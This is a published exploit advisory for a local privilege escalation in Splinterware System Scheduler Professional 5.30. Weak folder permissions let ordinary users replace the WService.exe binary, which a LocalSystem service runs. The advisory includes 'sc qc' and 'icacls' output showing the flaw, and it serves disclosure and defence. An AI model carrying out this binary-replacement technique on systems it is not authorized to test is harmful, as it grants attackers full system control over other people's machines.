Splinterware System Scheduler Professional 5.30 Privilege Escalation

2021.05.25
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation # Date: 2021-05-11 # Exploit Author: Andrea Intilangelo # Vendor Homepage: https://www.splinterware.com # Software Link: https://www.splinterware.com/download/ssproeval.exe # Version: 5.30 Professional # Tested on: Windows 10 Pro 20H2 x64 System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System; renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one will be executed after a short while. C:\Users\test>sc qc WindowsScheduler [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: WindowsScheduler TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 0 IGNORE NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : System Scheduler Service DIPENDENZE : SERVICE_START_NAME : LocalSystem C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\ C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W) BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file C:\Users\test>


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top